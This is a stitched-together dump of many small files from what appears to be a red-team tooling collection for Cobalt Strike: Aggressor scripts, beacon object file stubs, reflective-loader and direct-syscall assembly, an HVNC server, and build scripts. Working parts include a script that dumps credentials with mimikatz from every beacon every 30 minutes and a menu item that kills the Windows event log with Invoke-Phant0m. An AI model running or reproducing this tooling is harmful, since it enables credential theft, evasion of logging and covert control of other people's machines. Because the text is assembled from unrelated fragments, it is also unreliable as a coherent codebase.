Python packages required - uses only standard library 3 | # 4 | # External system requirements: 5 | # - OpenSSH client (ssh, scp commands) 6 | # - SSH config with teamserver entry 7 | # - SSH key-based authentication to teamserver 8 | -------------------------------------------------------------------------------- /Cobatl Strike/Aggressor Script 1/mimikatz-every-30m.cna: -------------------------------------------------------------------------------- 1 | # author: bluescreenofjeff 2 | #runs the mimikatz logonpasswords alias on all beacons 3 | 4 | on heartbeat_30m { 5 | foreach $beacon (beacons()) { 6 | $id = $beacon['id']; 7 | binput($id, "logonpasswords"); 8 | blogonpasswords($id); 9 | } 10 | } -------------------------------------------------------------------------------- /Cobatl Strike/Nim Beacon/cmd/dns.nim: -------------------------------------------------------------------------------- 1 | import std/[os, strutils, sequtils, times, streams, endians, tables] 2 | import ../[utils, config] 3 | import types, result 4 | 5 | proc dns_checkin(buf: var seq[byte], cmd: command_type) = 6 | # No need to handle this? 
7 | discard 8 | 9 | register_command(CMD_TYPE_CHECKIN, dns_checkin) -------------------------------------------------------------------------------- /Loader/AceLdr/src/asm/start.asm: -------------------------------------------------------------------------------- 1 | [BITS 64] 2 | 3 | EXTERN Ace 4 | GLOBAL Start 5 | 6 | [SECTION .text$A] 7 | 8 | Start: 9 | push rsi 10 | mov rsi, rsp 11 | and rsp, 0FFFFFFFFFFFFFFF0h 12 | sub rsp, 020h 13 | call Ace 14 | mov rsp, rsi 15 | pop rsi 16 | ret 17 | -------------------------------------------------------------------------------- /Loader/HellLoader/HellsGate/HellsGate/HellsGate/connector.h: -------------------------------------------------------------------------------- 1 | 2 | #ifndef CONNECTOR_H 3 | #define CONNECTOR_H 4 | 5 | #ifdef __cplusplus 6 | extern "C" { 7 | #endif 8 | 9 | int Download(); 10 | 11 | 12 | #ifdef __cplusplus 13 | 14 | } 15 | #endif // __cplusplus 16 | 17 | #endif // CONNECTOR_H 18 | 19 | -------------------------------------------------------------------------------- /Cobatl Strike/Psk/psk_bof.s1.py: -------------------------------------------------------------------------------- 1 | from outflank_stage1.task.base_bof_task import BaseBOFTask 2 | 3 | 4 | class PskBOF(BaseBOFTask): 5 | def __init__(self): 6 | super().__init__("psk", base_binary_name="Psk") 7 | 8 | self.parser.description = "Show detailed information from the windows kernel and loaded driver modules." 9 | -------------------------------------------------------------------------------- /Cobatl Strike/Aggressor Script 1/beaconid_note.cna: -------------------------------------------------------------------------------- 1 | #author bluscreenofjeff 2 | 3 | #on load and initial Beacon set note to the Beacon id 4 | #(primarily useful when coding Aggressor scripts) 5 | 6 | on beacon_initial { 7 | bnote($1,$1); 8 | } 9 | 10 | foreach $beacon (beacons()){ 11 | bnote($beacon['id'],"bid: " . 
$beacon['id']); 12 | } -------------------------------------------------------------------------------- /Cobatl Strike/Aggressor Script 3/beaconid_note.cna: -------------------------------------------------------------------------------- 1 | #author bluscreenofjeff 2 | 3 | #on load and initial Beacon set note to the Beacon id 4 | #(primarily useful when coding Aggressor scripts) 5 | 6 | on beacon_initial { 7 | bnote($1,$1); 8 | } 9 | 10 | foreach $beacon (beacons()){ 11 | bnote($beacon['id'],"bid: " . $beacon['id']); 12 | } -------------------------------------------------------------------------------- /Cobatl Strike/Psc/psc_bof.s1.py: -------------------------------------------------------------------------------- 1 | from outflank_stage1.task.base_bof_task import BaseBOFTask 2 | 3 | 4 | class PscBOF(BaseBOFTask): 5 | def __init__(self): 6 | super().__init__("psc", base_binary_name="Psc") 7 | 8 | self.parser.description = "Show detailed information from processes with established TCP and RDP connections." 9 | -------------------------------------------------------------------------------- /Cobatl Strike/bluescreenofjeff/beaconid_note.cna: -------------------------------------------------------------------------------- 1 | #author bluscreenofjeff 2 | 3 | #on load and initial Beacon set note to the Beacon id 4 | #(primarily useful when coding Aggressor scripts) 5 | 6 | on beacon_initial { 7 | bnote($1,$1); 8 | } 9 | 10 | foreach $beacon (beacons()){ 11 | bnote($beacon['id'],"bid: " . $beacon['id']); 12 | } -------------------------------------------------------------------------------- /Cobatl Strike/Psw/psw_bof.s1.py: -------------------------------------------------------------------------------- 1 | from outflank_stage1.task.base_bof_task import BaseBOFTask 2 | 3 | 4 | class PswBOF(BaseBOFTask): 5 | def __init__(self): 6 | super().__init__("psw", base_binary_name="Psw") 7 | self.parser.description = ( 8 | "Show Window titles from processes with active Windows." 
9 | ) 10 | -------------------------------------------------------------------------------- /Loader/Titan Ldr/Peb.h: -------------------------------------------------------------------------------- 1 | /** 2 | * 3 | * Reflective Loader 4 | * 5 | * GuidePoint Security LLC 6 | * 7 | * Threat and Attack Simulation 8 | * 9 | **/ 10 | 11 | #pragma once 12 | 13 | /*! 14 | * 15 | * Purpose: 16 | * 17 | * Finds a module loaded in memory. 18 | * 19 | !*/ 20 | 21 | D_SEC( E ) PVOID PebGetModule( _In_ ULONG Hash ); 22 | -------------------------------------------------------------------------------- /Cobatl Strike/Smbinfo/SOURCE/Smbinfo.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | 6 | //NETAPI32 7 | typedef NET_API_STATUS(WINAPI *_NetWkstaGetInfo)( 8 | LMSTR servername, 9 | DWORD level, 10 | LPBYTE *bufptr 11 | ); 12 | 13 | typedef NET_API_STATUS(WINAPI *_NetApiBufferFree)( 14 | LPVOID Buffer 15 | ); 16 | -------------------------------------------------------------------------------- /Cobatl Strike/Webcam BOF/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 
7 | 8 | #include 9 | -------------------------------------------------------------------------------- /Cobatl Strike/Domaininfo/Domaininfo_bof.s1.py: -------------------------------------------------------------------------------- 1 | from outflank_stage1.task.base_bof_task import BaseBOFTask 2 | 3 | 4 | class DomainInfoBOF(BaseBOFTask): 5 | def __init__(self): 6 | super().__init__("Domaininfo") 7 | self.parser.description = ( 8 | "Using Active Directory Domain Services to enumerate domain information." 9 | ) 10 | -------------------------------------------------------------------------------- /Cobatl Strike/RDP Thief/RdpThief/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 7 | 8 | #include 9 | -------------------------------------------------------------------------------- /Cobatl Strike/FortyNorthSecurity/Initial Access/Notifications/text_aggressor.cna: -------------------------------------------------------------------------------- 1 | on beacon_initial { 2 | local('$computer'); 3 | local('$internal'); 4 | $computer = beacon_info($1, "computer"); 5 | $internal = beacon_info($1, "internal"); 6 | exec("/root/cobaltstrike/emailme.py --ip " . $internal . " --computer '" . $computer . 
"'"); 7 | } 8 | -------------------------------------------------------------------------------- /Loader/HellLoader/HellsGate/HellsGate/HellsGate/hellsgate.asm: -------------------------------------------------------------------------------- 1 | 2 | .data 3 | wSystemCall DWORD 000h 4 | 5 | .code 6 | HellsGate PROC 7 | mov wSystemCall, 000h 8 | mov wSystemCall, ecx 9 | ret 10 | HellsGate ENDP 11 | 12 | HellDescent PROC 13 | mov r10, rcx 14 | mov eax, wSystemCall 15 | 16 | syscall 17 | ret 18 | HellDescent ENDP 19 | end 20 | -------------------------------------------------------------------------------- /Loader/Titan Ldr/Pe.h: -------------------------------------------------------------------------------- 1 | /** 2 | * 3 | * Reflective Loader 4 | * 5 | * GuidePoint Security LLC 6 | * 7 | * Threat and Attack Simulation 8 | * 9 | **/ 10 | 11 | #pragma once 12 | 13 | /*! 14 | * 15 | * Purpose: 16 | * 17 | * Searches for a export matching the specified hash. 18 | * 19 | !*/ 20 | 21 | D_SEC( E ) PVOID PeGetFuncEat( _In_ PVOID Image, _In_ ULONG Hash ); 22 | -------------------------------------------------------------------------------- /Cobatl Strike/Aggressor CNA/JuickyPotato_DLL/JuicyPotato/stdafx.cpp: -------------------------------------------------------------------------------- 1 | // stdafx.cpp : source file that includes just the standard includes 2 | // MSFRottenPotato.pch will be the pre-compiled header 3 | // stdafx.obj will contain the pre-compiled type information 4 | 5 | #include "stdafx.h" 6 | 7 | // TODO: reference any additional headers you need in STDAFX.H 8 | // and not in this file 9 | -------------------------------------------------------------------------------- /Cobatl Strike/Hidden Desktop/client/asm/x64/start.asm: -------------------------------------------------------------------------------- 1 | ; https://github.com/SolomonSklash/netntlm/blob/master/asm/x64/start.asm 2 | [BITS 64] 3 | 4 | GLOBAL GetIp 5 | GLOBAL Leave 6 | 7 | [SEGMENT 
.text$F] 8 | 9 | GetIp: 10 | call get_ret_ptr 11 | 12 | get_ret_ptr: 13 | pop rax 14 | sub rax, 5 15 | ret 16 | 17 | Leave: 18 | db 'W', 'K', 'L', 'H', 'V', 'N', 'C' 19 | -------------------------------------------------------------------------------- /Cobatl Strike/Hell sHall/test/helperfunc.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | 4 | unsigned char* ReadFileToBuffer(const char* filename, size_t* out_size); 5 | unsigned char* ExtractBlob(const char* carrier_file, size_t* out_size); 6 | unsigned char* DecryptBlob(const unsigned char* blob, size_t blob_size, size_t* out_size); 7 | unsigned char* Decrypt(const char* carrier_file, size_t* out_size); 8 | 9 | -------------------------------------------------------------------------------- /Cobatl Strike/Aggressor CNA/JuickyPotato_DLL/JuicyPotato/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 
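7 | 8 | #include 9 | -------------------------------------------------------------------------------- /Cobatl Strike/Beaconator/scripts/scarecrow_helper.py: --------------------------------------------------------------------------------
#!/usr/bin/python3
"""Run one command line and relay its standard output line by line.

Usage: scarecrow_helper.py "<command line>"
Raises subprocess.CalledProcessError when the command exits non-zero.
"""

import sys
import subprocess

# The whole command line arrives as a single argument.
command = sys.argv[1]

# shell=True hands the string to the system shell unmodified, so every
# metacharacter in it is interpreted. The caller must build this string only
# from values it controls; nothing here validates or quotes it.
with subprocess.Popen(command, stdout=subprocess.PIPE, bufsize=1, universal_newlines=True, shell=True) as p:
    # bufsize=1 in text mode is line buffering, so output is relayed as it appears.
    for b in p.stdout:
        print(b, end='')

# Leaving the with-block waits for the child, so returncode is set here.
if p.returncode != 0:
    # CalledProcessError lives in the subprocess module; the bare name was
    # never imported, so the original line raised NameError instead.
    raise subprocess.CalledProcessError(p.returncode, p.args)
-------------------------------------------------------------------------------- /Cobalt Strike Win Exec/doc/build/secret.c: --------------------------------------------------------------------------------

/*
 * check_password - compare a candidate string with the built-in value.
 *
 * Returns 1 when both strings end at the same position with every byte
 * equal, 0 otherwise.
 *
 * NOTE(review): the loop returns at the first differing byte, so the running
 * time grows with the length of the matching prefix. The text of the literal
 * suggests this is a deliberate demonstration of a timing side channel. Code
 * that guards a real secret compares in constant time (visit every byte,
 * accumulate the differences, decide once at the end) and does not keep the
 * secret as a plain string literal, which is readable in the compiled binary.
 */
int check_password(char* password) {
    char* actual = "oh no i haz been hax by a side channel attack!";

    while (1) {
        /* End of either string: equal only if both ended together. */
        if (*password == '\0' || *actual == '\0') {
            return *password == *actual;
        }

        /* Early exit on mismatch: this is the data-dependent branch. */
        if (*password != *actual) {
            return 0;
        }

        password++;
        actual++;
    }

    /* Not reached: every path out of the loop returns. */
    return 0;
}
-------------------------------------------------------------------------------- /Cobatl Strike/Erebus/modules/gather.cna: -------------------------------------------------------------------------------- 1 | #define functions 2 | 3 | 4 | #append menus 5 | 6 | menu "Gather"{ 7 | item "Process Detail"{ 8 | local('$bid'); 9 | $bid = $1; 10 | if ( -isadmin $bid['@'] ){ 11 | bshell($bid,"wmic process get caption,executablepath,commandline"); 12 | return; 13 | } 14 | } 15 | } -------------------------------------------------------------------------------- /Cobatl Strike/ForceLockScreen/forcelockscreen.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include "forcelockscreen.h" 3 | #include "beacon.h" 4 | 5 | #pragma comment(lib, "User32.lib") 6 | 7 | int go() { 8 | 9 | USER32$LockWorkStation(); 10 | 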
BeaconPrintf(CALLBACK_OUTPUT, "[+] Lock screen forced for current user session.\n"); 11 | 12 | return 0; 13 | } 14 | 15 | 16 | 17 | 18 | 19 | -------------------------------------------------------------------------------- /Cobatl Strike/Hell sHall/Hell'sHall/helperfunc.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | 4 | unsigned char* ReadFileToBuffer(const char* filename, size_t* out_size); 5 | unsigned char* ExtractBlob(const char* carrier_file, size_t* out_size); 6 | unsigned char* DecryptBlob(const unsigned char* blob, size_t blob_size, size_t* out_size); 7 | unsigned char* Decrypt(const char* carrier_file, size_t* out_size); 8 | 9 | -------------------------------------------------------------------------------- /Cobalt Strike Win Exec/cmake/build/secret.c: -------------------------------------------------------------------------------- 1 | 2 | int check_password(char* password) { 3 | char* actual = "oh no i haz been hax by a side channel attack!"; 4 | 5 | while (1) { 6 | if (*password == '\0' || *actual == '\0') { 7 | return *password == *actual; 8 | } 9 | 10 | if (*password != *actual) { 11 | return 0; 12 | } 13 | 14 | password++; 15 | actual++; 16 | } 17 | 18 | return 0; 19 | } -------------------------------------------------------------------------------- /Cobatl Strike/Hidden Desktop/client/asm/x86/start.asm: -------------------------------------------------------------------------------- 1 | ; https://github.com/SolomonSklash/netntlm/blob/master/asm/x86/start.asm 2 | [BITS 32] 3 | 4 | GLOBAL _GetIp 5 | GLOBAL _Leave 6 | 7 | [SEGMENT .text$F] 8 | 9 | _GetIp: 10 | call _get_ret_ptr 11 | 12 | _get_ret_ptr: 13 | pop eax 14 | sub eax, 5 15 | ret 16 | 17 | _Leave: 18 | db 'W', 'K', 'L', 'H', 'V', 'N', 'C' 19 | -------------------------------------------------------------------------------- /Loader/AceLdr/src/asm/misc.asm: 
-------------------------------------------------------------------------------- 1 | [BITS 64] 2 | 3 | GLOBAL GetIp 4 | GLOBAL Stub 5 | 6 | 7 | [SECTION .text$C] 8 | 9 | Stub: 10 | dq 0 11 | dq 0 12 | dq 0 13 | 14 | 15 | [SECTION .text$F] 16 | 17 | GetIp: 18 | call get_ret_ptr 19 | 20 | get_ret_ptr: 21 | pop rax 22 | sub rax, 5 23 | ret 24 | 25 | Leave: 26 | db 'A', 'C', 'E', 'L', 'D', 'R' 27 | -------------------------------------------------------------------------------- /Cobatl Strike/StartWebClient/StartWebClient_bof.s1.py: -------------------------------------------------------------------------------- 1 | from typing import List, Tuple 2 | 3 | from outflank_stage1.task.base_bof_task import BaseBOFTask 4 | from outflank_stage1.task.enums import BOFArgumentEncoding 5 | 6 | 7 | class StartWebClientBOF(BaseBOFTask): 8 | def __init__(self): 9 | super().__init__("StartWebClient") 10 | self.parser.description = "Starting WebClient Service Programmatically." 11 | -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Artifact Kit/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "artifact64big" 3 | version = "0.1.0" 4 | edition = "2024" 5 | 6 | [dependencies] 7 | windows-sys = { version = "0.59", features = [ 8 | "Win32_Foundation", 9 | "Win32_System_Diagnostics_ToolHelp", 10 | "Win32_System_Memory", 11 | "Win32_System_Threading", 12 | ] } 13 | [build] 14 | rustflags = ["-C", "link-args=-Wl,--section=.rdata=.text"] 15 | -------------------------------------------------------------------------------- /Cobatl Strike/Elusive Mice/Makefile: -------------------------------------------------------------------------------- 1 | CC_x64 := x86_64-w64-mingw32-gcc 2 | CC_x86 := i686-w64-mingw32-gcc 3 | 4 | CFLAGS := $(CFLAGS) -O0 5 | CFLAGS := $(CFLAGS) -masm=intel -Wall -Wno-pointer-arith -w 6 | 7 | all: clean 8 | $(CC_x64) $(CFLAGS) -c src/elusiveMice.c 
-o bin/elusiveMice.x64.o 9 | $(CC_x86) $(CFLAGS) -c src/elusiveMice.c -o bin/elusiveMice.x86.o 10 | cp elusiveMice.cna bin 11 | 12 | clean: 13 | rm -f bin/*.o 14 | -------------------------------------------------------------------------------- /Cobatl Strike/p292/disableeventvwr.cna: -------------------------------------------------------------------------------- 1 | popup beacon_bottom { 2 | menu "Event Viewer Tools" { 3 | item "Disable Event Viewer"{ 4 | local('$bid'); 5 | foreach $bid ($1){ 6 | bpowershell_import($bid, script_resource("disableeventvwr/Invoke-Phant0m.ps1")); 7 | bpowershell($bid, "Invoke-Phant0m"); 8 | elog("Event Log Killed by " . mynick() . " on " . binfo("$bid", "computer")); 9 | } 10 | } 11 | } 12 | } -------------------------------------------------------------------------------- /Cobatl Strike/BOF Oxide/src/rust_bof.rs: -------------------------------------------------------------------------------- 1 | use crate::Beacon; 2 | use core::ffi::c_char; 3 | 4 | // This will be the main file we edit to write out BOFs. 
5 | pub fn rust_bof(mut beacon: Beacon) { 6 | let str_arg = beacon.get_arg(); 7 | if str_arg.is_null() { 8 | beacon.output("Please provide a str:\"arg\""); 9 | } else { 10 | beacon.printf("Hello %s from rust bof\0", str_arg as *mut c_char); 11 | } 12 | } 13 | -------------------------------------------------------------------------------- /Cobatl Strike/BeLix/encrypt/utils.go: -------------------------------------------------------------------------------- 1 | package encrypt 2 | 3 | import ( 4 | "time" 5 | 6 | "golang.org/x/exp/rand" 7 | ) 8 | 9 | /* RandomInt returns min plus a pseudo-random offset in [0, max-min). It reseeds the package-level generator from the current time in nanoseconds on every call; rand.Intn panics when max-min is not positive. */ func RandomInt(min, max int) int { 10 | t := time.Now().UnixNano() 11 | rand.Seed(uint64(t)) 12 | return min + rand.Intn(max-min) 13 | } 14 | 15 | 16 | /* RandomAESKey returns 16 bytes read from the package-level generator of golang.org/x/exp/rand and panics if the read fails. NOTE(review): that package is a general-purpose pseudo-random generator, not a cryptographic one, and this function never seeds it, so the output is determined by whatever seed is in effect (RandomInt sets one from the clock). Treat keys from this function as guessable; key material belongs to crypto/rand. */ func RandomAESKey() []byte { 17 | key := make([]byte,16) 18 | _, err := rand.Read(key[:]) 19 | if err != nil { 20 | panic(err) 21 | } 22 | return key 23 | } -------------------------------------------------------------------------------- /Loader/AceLdr/bin/AceLdr.cna: -------------------------------------------------------------------------------- 1 | set BEACON_RDLL_GENERATE { 2 | $smpath = script_resource( "AceLdr.". $3 .".bin" ); 3 | $hnd = openf( $smpath ); 4 | $ldr = readb( $hnd, -1 ); 5 | closef( $hnd ); 6 | 7 | if ( strlen( $ldr ) == 0 ) { 8 | return $null; 9 | }; 10 | warn("Loading custom user defined reflective loader from: " . $smpath); 11 | 12 | return setup_transformations($ldr . 
$2, $3); 13 | }; 14 | -------------------------------------------------------------------------------- /threatexpress/beacon_webview/beacons.csv: -------------------------------------------------------------------------------- 1 | id,pid,pbid,user,os,ver,host,computer,charset,internal,external,port,session,last,lastf,is64,barch,alive,note 2 | 26239,8284,27265,admin,Windows,10.0,172.30.149.81,WIN10,windows-1252,172.30.149.81,172.30.149.81 ⚯⚯,,beacon,848227,14m,1,x86,true,NEW; x86; SMB parent 8284 3 | 27265,4272,,admin,Windows,10.0,172.30.149.81,WIN10,windows-1252,172.30.149.81,172.16.214.128,,beacon,503,503ms,1,x86,true,NEW; x86; sleep 60 20 4 | -------------------------------------------------------------------------------- /Cobatl Strike/BOF CredUI/credui.cna: -------------------------------------------------------------------------------- 1 | alias credui { 2 | 3 | # figure out the arch of this session 4 | $barch = barch($1); 5 | 6 | # read in the right BOF file 7 | $handle = openf(script_resource("credui. $+ $barch $+ .o")); 8 | $data = readb($handle, -1); 9 | closef($handle); 10 | 11 | # pack our arguments 12 | $args = bof_pack($1, "ZZ", $2, $3); 13 | 14 | # execute it 15 | beacon_inline_execute($1, $data, "launch", $args); 16 | } -------------------------------------------------------------------------------- /Cobatl Strike/bluescreenofjeff/ps-window-alias.cna: -------------------------------------------------------------------------------- 1 | #author bluescreenofjeff 2 | 3 | #alias for "pspane" to open the process browser pane for the current Beacon 4 | 5 | #register help 6 | beacon_command_register("pspane", "open process browser pane", 7 | "Synopsis: pspane \n\n" . 
8 | "Open the process browser pane for the current Beacon."); 9 | 10 | #setting the alias 11 | alias pspane { 12 | binput($1,"ps"); 13 | openProcessBrowser($1); 14 | } 15 | -------------------------------------------------------------------------------- /Cobatl Strike/Aggressor Script 3/ps-window-alias.cna: -------------------------------------------------------------------------------- 1 | #author bluescreenofjeff 2 | 3 | #alias for "pspane" to open the process browser pane for the current Beacon 4 | 5 | #register help 6 | beacon_command_register("pspane", "open process browser pane", 7 | "Synopsis: pspane \n\n" . 8 | "Open the process browser pane for the current Beacon."); 9 | 10 | #setting the alias 11 | alias pspane { 12 | binput($1,"ps"); 13 | openProcessBrowser($1); 14 | } 15 | -------------------------------------------------------------------------------- /Cobatl Strike/Winver/Winver_bof.s1.py: -------------------------------------------------------------------------------- 1 | from typing import List, Tuple 2 | 3 | from outflank_stage1.task.base_bof_task import BaseBOFTask 4 | from outflank_stage1.task.enums import BOFArgumentEncoding 5 | 6 | 7 | class WinverBOF(BaseBOFTask): 8 | def __init__(self): 9 | super().__init__("Winver") 10 | self.parser.description = "Display the version of Windows that is running, the build number and patch release (Update Build Revision)." 
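11 | -------------------------------------------------------------------------------- /Cobatl Strike/killswitch GUI/cs-install.sh: --------------------------------------------------------------------------------
#!/bin/bash
# adapted from @christruncer
# just an example
#
# Downloads the Cobalt Strike trial archive, unpacks it and installs the build
# tools and Java packages listed below.

# Stop at the first failed step so a broken or partial download is never unpacked.
set -euo pipefail

wget https://www.cobaltstrike.com/downloads/a24a41fcae308883d74f3b57e36e5bbb/cobaltstrike-trial.tgz

# NOTE(review): the archive is unpacked without any integrity check. Compare it
# with a digest obtained from the vendor over a separate channel before
# extracting, for example:
#   echo "<SHA256_FROM_VENDOR_PLACEHOLDER>  cobaltstrike-trial.tgz" | sha256sum -c -
tar zxvf cobaltstrike-trial.tgz

sudo apt-get update -y
sudo apt-get install build-essential -y

# NOTE(review): this adds a third-party PPA whose packages are installed as
# root, and Java 7 no longer receives public security updates. Prefer a
# supported JDK from the distribution's own repositories.
sudo add-apt-repository ppa:webupd8team/java -y
sudo apt-get update -y
sudo apt-get install oracle-java7-installer -y
-------------------------------------------------------------------------------- /Und3rf10w/Pushover/pushover-cs: --------------------------------------------------------------------------------
#!/bin/bash
# Send one Pushover notification.
# With arguments: the first is the title, the rest form the message.
# Without arguments: the message is one line read from standard input.
if [[ $# -gt 0 ]]; then
    title=$1
    shift
    # Join the remaining arguments into one string.
    a="$*"
else
    # -r keeps backslashes in the message literal.
    read -r a
fi

# pushover TOKEN USER TITLE
# Posts the message held in $a to the Pushover messages endpoint.
pushover () {
    # --form-string sends each value literally. With -F, a value that starts
    # with '@' or '<' makes curl read a local file and send its contents, and
    # the message text here may originate from data the operator does not control.
    curl -s --form-string "token=$1" --form-string "user=$2" --form-string "title=$3" --form-string "message=$a" https://api.pushover.net/1/messages.json
}

# sample pushover user config
# add a line for each user you wish to receive a message
# pushover "$title" "$a" #sample_username1
# NOTE(review): the function takes token, user and title as $1..$3 and reads the
# message from $a, so a real entry would look like
#   pushover "<APP_TOKEN_PLACEHOLDER>" "<USER_KEY_PLACEHOLDER>" "$title"
-------------------------------------------------------------------------------- /Cobatl Strike/C2 Crash/dict/username.txt: -------------------------------------------------------------------------------- 1 | AliceWang 2 | BobLi 3 | CharlieZhang 4 | DavidChen 5 | EvaLiu 6 | FrankWu 7 | GraceYang 8 | HenryLin 9 | IvyHuang 10 | JackieZhao 11 | KevinSun 12 | LindaGuo 13 | MichaelXu 14 | NancyHe 15 | OscarFeng 16 | PatriciaGao 17 | QuincyTang 18 | RachelDeng 19 | StevenMa 20 | TinaShen 21 | VictorCai 22 | WendyQin 23 | XavierWu 24 | YvonneJiang 25 | ZacharyCheng 26 | LilyWu 27 | JasonLiang 28 | AmyZhou 29 | EricHuang 30 | SophieLin -------------------------------------------------------------------------------- /Loader/Titan Ldr/Hash.h: 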
-------------------------------------------------------------------------------- 1 | /** 2 | * 3 | * Reflective Loader 4 | * 5 | * GuidePoint Security LLC 6 | * 7 | * Threat and Attack Simulation 8 | * 9 | **/ 10 | 11 | #pragma once 12 | 13 | /*! 14 | * 15 | * Purpose: 16 | * 17 | * Creates a hash summary of the input buffer. 18 | * If a length is not provided, it assumes it 19 | * is NULL terminated. 20 | * 21 | !*/ 22 | 23 | D_SEC( E ) UINT32 HashString( _In_ PVOID Buffer, _In_opt_ ULONG Length ); 24 | -------------------------------------------------------------------------------- /Cobatl Strike/Hidden Desktop/client/util.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | SECTION( E ) UINT32 HashString( PVOID buffer, ULONG size ); 4 | SECTION( E ) PVOID FindModule( ULONG hash, PPEB peb ); 5 | SECTION( E ) PVOID FindFunction( PVOID image, ULONG hash ); 6 | SECTION( E ) SIZE_T strlenA( PCHAR str ); 7 | SECTION( E ) PCHAR strcpyA( PCHAR dst, PCHAR src ); 8 | SECTION( E ) PCHAR strcatA( PCHAR dst, PCHAR src ); 9 | SECTION( E ) INT strcmpA( PCHAR String1, PCHAR String2 ); 10 | -------------------------------------------------------------------------------- /Cobatl Strike/Hidden Desktop/client/types.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | typedef HDC *PHDC; 4 | typedef HBITMAP *PHBITMAP; 5 | typedef CLSID *PCLSID; 6 | typedef GpBitmap GPBITMAP; 7 | typedef GPBITMAP *PGPBITMAP; 8 | typedef IStream *PISTREAM; 9 | typedef EncoderParameters ENCODERPRM; 10 | 11 | typedef BOOL ( CALLBACK* PICWNDENUMPROC )(HWND, LPARAM, PAPI ); 12 | 13 | typedef struct 14 | { 15 | HDC hDc; 16 | HDC hDcScreen; 17 | } WINDOWS, *PWINDOWS; 18 | -------------------------------------------------------------------------------- /Cobatl Strike/Hidden Desktop/server/common.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 
3 | #include 4 | #include 5 | #include 6 | #include 7 | 8 | #include "../shared/native.h" 9 | #include "../shared/config.h" 10 | 11 | #define MAX_CLIENTS 256 12 | #define CLASS "HiddenDesktop_ControlWindow" 13 | #define WINDOW_TITLE "HVNC Operator UI" 14 | #define CONSOLE_TITLE "HVNC Server" 15 | #define PORT 1337 16 | -------------------------------------------------------------------------------- /Cobatl Strike/Hidden Desktop/server/main.c: -------------------------------------------------------------------------------- 1 | #include "common.h" 2 | #include "controlwindow.h" 3 | #include "server.h" 4 | 5 | int main( void ) 6 | { 7 | HANDLE handleConsole = GetStdHandle( STD_OUTPUT_HANDLE ); 8 | SetConsoleTitleA( CONSOLE_TITLE ); 9 | printf( "[+] Starting HVNC Server on Port: %d\n", PORT ); 10 | 11 | StartServer( PORT ); 12 | getchar(); 13 | 14 | CloseHandle( handleConsole ); 15 | return 0; 16 | }; 17 | -------------------------------------------------------------------------------- /VYSEC/CACTUSTORCH/banner.txt: -------------------------------------------------------------------------------- 1 | ███████╗██████╗ ██╗ ██╗████████╗██╗ ██╗██████╗ █████╗ 2 | ██╔════╝██╔══██╗██║ ██║╚══██╔══╝██║ ██║██╔══██╗██╔══██╗ 3 | ███████╗██████╔╝██║ ██║ ██║ ██║ ██║██████╔╝███████║ 4 | ╚════██║██╔═══╝ ██║ ██║ ██║ ╚██╗ ██╔╝██╔══██╗██╔══██║ 5 | ███████║██║ ███████╗██║ ██║ ╚████╔╝ ██████╔╝██║ ██║ 6 | ╚══════╝╚═╝ ╚══════╝╚═╝ ╚═╝ ╚═══╝ ╚═════╝ ╚═╝ ╚═╝ 7 | -------------------------------------------------------------------------------- /Cobatl Strike/Add User BOF/Makefile: -------------------------------------------------------------------------------- 1 | BOF := AddUser-Bof 2 | CC_x64 := x86_64-w64-mingw32-gcc 3 | CC_x86 := i686-w64-mingw32-gcc 4 | STRIP_x64 := x86_64-w64-mingw32-strip 5 | STRIP_x86 := i686-w64-mingw32-strip 6 | 7 | all: 8 | $(CC_x64) -o dist/$(BOF).x64.o -c AddUser-Bof.c 9 | $(STRIP_x64) --strip-unneeded dist/$(BOF).x64.o 10 | $(CC_x86) -o dist/$(BOF).x86.o -c 
AddUser-Bof.c 11 | $(STRIP_x86) --strip-unneeded dist/$(BOF).x86.o 12 | 13 | clean: 14 | rm -f dist/*.o 15 | -------------------------------------------------------------------------------- /Loader/Cobalt Strike Crystal Kit/udrl/Makefile: -------------------------------------------------------------------------------- 1 | CC_64=x86_64-w64-mingw32-gcc 2 | 3 | all: bin/loader.x64.o 4 | 5 | bin: 6 | mkdir bin 7 | 8 | bin/loader.x64.o: bin 9 | $(CC_64) -DWIN_X64 -shared -Wall -Wno-pointer-arith -c src/loader.c -o bin/loader.x64.o 10 | $(CC_64) -DWIN_X64 -shared -Wall -Wno-pointer-arith -c src/proxy.c -o bin/proxy.x64.o 11 | $(CC_64) -DWIN_X64 -shared -Wall -Wno-pointer-arith -c src/hook.c -o bin/hook.x64.o 12 | 13 | clean: 14 | rm -f bin/* 15 | -------------------------------------------------------------------------------- /Cobatl Strike/bluescreenofjeff/checkin_jobs_context.cna: -------------------------------------------------------------------------------- 1 | #author bluescreenofjeff 2 | 3 | #adds context menu options to run "checkin" or "jobs" on Beacon session to help detect stale beacons in bulk 4 | 5 | 6 | #context menu building 7 | popup beacon_bottom { 8 | menu "Checkin"{ 9 | item 'Run "checkin"' { 10 | binput($1, "checkin"); 11 | bcheckin($1); 12 | } 13 | item 'Run "jobs"' { 14 | binput($1, "jobs"); 15 | bjobs($1); 16 | } 17 | } 18 | } 19 | 20 | -------------------------------------------------------------------------------- /Loader/Cobalt Strike Crystal Kit/postex-udrl/Makefile: -------------------------------------------------------------------------------- 1 | CC_64=x86_64-w64-mingw32-gcc 2 | 3 | all: bin/loader.x64.o 4 | 5 | 